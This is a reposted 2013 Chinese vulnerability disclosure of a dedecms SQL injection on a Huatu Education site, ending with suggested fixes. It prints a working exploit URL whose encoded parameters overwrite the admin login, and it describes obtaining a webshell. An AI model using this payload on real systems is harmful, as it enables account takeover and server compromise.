转载

华图教育旗下某站SQL注射漏洞,可以轻易获取WEBSHELL

漏洞标题 华图教育旗下某站SQL注射漏洞,可以轻易获取WEBSHELL
相关厂商 华图教育
漏洞作者 her0ma
提交时间 2013-06-08 10:55
公开时间 2013-06-13 10:56
漏洞类型 SQL注射漏洞
危害等级
自评Rank 20
漏洞状态 漏洞已经通知厂商但是厂商忽略漏洞
Tags标签 sql注射,华图教育,华图网校,getshell

漏洞详情

看到最新dedecms的漏洞,测试发现的华图教育旗下华图网校:http://v.huatu.com/htnews使用的是dedecms v57sp1,存在最新的注入漏洞。

http://v.huatu.com/htnews/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35

向数据库中插入管理帐号spider 密码 admin

后台可以轻易拿到webshell,该漏洞也可以直接getshell!

漏洞证明:

漏洞证明如下:

华图教育旗下某站SQL注射漏洞,可以轻易获取WEBSHELL

华图教育旗下某站SQL注射漏洞,可以轻易获取WEBSHELL

不知道是管理大半夜在线,还是服务器有防火墙之类的东西,上去的一句话后来被清理掉了。感觉后台不咋灵活了,就没再继续深入,怕对网站有影响!

getshell之后不知道是未在plus目录下生成,还是被清理了,没再次测试,怕对后台功能产生影响!

修复方案:

dedecms 最新漏洞 原作者:imspider

在某BLOG上看到的。

修复方法:1,dedecms官方应该无补丁,可以考虑删除掉download.php?没详细看漏洞细节,可以试试这个方法;

2,服务器磁盘权限建议设置更加严格一些!!权限太大,F盘很多敏感资料!

3,robots.txt文件定义一下蜘蛛爬行的相关规则,不要允许抓去后台目录下的文件!

4,后台登录页面title也修改一下吧!

and so on!!!你们比我更专业,总之用dede的话一定要慎重,dede这么多年就没消停过!!!!这样还能坚挺的活着,真不容易!

版权声明:转载请注明来源 her0ma @ 乌云

正文到此结束
Loading...